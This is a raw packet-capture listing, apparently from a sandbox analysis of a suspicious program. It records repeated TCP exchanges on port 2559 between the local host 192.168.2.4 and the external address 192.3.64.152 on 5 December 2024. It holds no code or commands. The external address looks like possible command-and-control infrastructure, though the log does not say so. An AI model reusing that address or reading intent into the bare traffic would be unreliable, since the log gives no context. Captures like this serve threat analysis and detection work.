                                                                                                                                              Dec 5, 2024 18:25:59.981563091 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981581926 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981708050 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981719017 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981806040 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.981988907 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982000113 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982033968 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982214928 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982235909 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982285023 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982295036 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.982988119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983189106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983198881 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983216047 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983349085 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983474016 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983484030 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983493090 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983701944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:25:59.983711958 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.441432953 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.564940929 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.779536963 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.823219061 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.831798077 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.876646042 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.878211975 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:00.996984959 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997020960 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997056007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997153044 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997164011 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997174025 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997183084 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997194052 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997253895 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997303009 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997313976 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997391939 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997487068 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.997497082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998132944 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998164892 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998298883 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998308897 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998318911 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998374939 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998497963 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998603106 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998613119 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:00.998671055 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.008358002 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.016550064 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.137597084 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.137927055 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.257831097 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.457187891 CET497412559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.536941051 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537113905 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537216902 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537220001 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.537667990 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537681103 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.537727118 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.538464069 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.538485050 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.538535118 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.539289951 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.541897058 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.545644999 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.545890093 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.545938015 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.554264069 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.554461002 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.554519892 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.577997923 CET255949741192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.657113075 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.657375097 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.657499075 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.728771925 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.728935003 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.728991032 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.731121063 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.731378078 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.731920004 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.739218950 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.739634991 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.739700079 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.745347023 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.745503902 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.745624065 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.753375053 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.753554106 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.753627062 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.761409044 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.761610985 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.764944077 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.769407034 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.769617081 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.769687891 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.777404070 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.777656078 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.780014992 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.785661936 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.786411047 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.786497116 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.793425083 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.793616056 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.793675900 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.801481009 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.801728964 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.801811934 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.808516979 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.808696032 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.808748960 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.815464020 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.843158007 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.863050938 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.894081116 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.896099091 CET497422559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.945306063 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.945450068 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.945540905 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.947422028 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.947602034 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.947669029 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.951770067 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.951984882 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.952039003 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.956202984 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.956443071 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.956523895 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.960675001 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.960870028 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.960916042 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.965042114 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.965228081 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.965281010 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.969542980 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.969737053 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.969798088 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.973845959 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.974047899 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.974101067 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.978307962 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.978493929 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.978554964 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.982713938 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.982891083 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.982947111 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.987104893 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.987306118 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.987363100 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.991563082 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.991786957 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.991842031 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:01.995959997 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.996166945 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:01.996221066 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.000382900 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.000637054 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.000698090 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.004815102 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.005011082 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.005049944 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.009226084 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.009388924 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.009434938 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.013797045 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014022112 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014072895 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.014348984 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014359951 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014374018 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014383078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014401913 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014410973 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014420033 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014435053 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014477015 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014527082 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014537096 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014678001 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014688969 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.014707088 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016122103 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016145945 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016247034 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016272068 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016398907 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016408920 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016508102 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016560078 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016596079 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.016695976 CET255949742192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.018013954 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.018208981 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.018268108 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.022459030 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.022649050 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.022706032 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.026804924 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.027209997 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.027266979 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.031291962 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.031588078 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.031637907 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.035737991 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.036010027 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.036072016 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.040110111 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.040344954 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.040402889 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.067380905 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.067574978 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.067627907 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.136734009 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.137029886 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.137104988 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.138859034 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.139067888 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.139108896 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.143129110 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.143352032 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.143395901 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.147361994 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.147547007 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.147586107 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.151609898 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.151768923 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.151813030 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.155754089 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.155862093 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.155905008 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.159593105 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.159826040 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.159869909 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.163266897 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.163484097 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.163527966 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.166969061 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.167180061 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.167229891 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.170569897 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.170783043 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.170830011 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.174104929 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.174403906 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.174455881 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.177478075 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.177696943 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.177737951 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.180876970 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.181123018 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.181160927 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.184309959 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.184603930 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.184642076 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.187753916 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.188040018 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.188086033 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.191168070 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.191354036 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.191400051 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.194701910 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.194942951 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.194987059 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.198131084 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.198318005 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.198363066 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.199939013 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.200181007 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.200220108 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.201695919 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.201898098 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.201935053 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.203542948 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.203758955 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.203794003 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.205424070 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.206491947 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.206537962 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.207274914 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.207621098 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.207660913 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.209136963 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.209377050 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.209414959 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.211035967 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.211271048 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.211321115 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.212975025 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.213428020 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.213470936 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.214999914 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.215013981 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.215073109 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.216615915 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.217153072 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.217190981 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.218548059 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.218944073 CET255949743192.3.64.152192.168.2.4
                                                                                                                                              Dec 5, 2024 18:26:02.218990088 CET497432559192.168.2.4192.3.64.152
                                                                                                                                              Dec 5, 2024 18:26:02.220292091 CET255949743192.3.64.152192.168.2.4
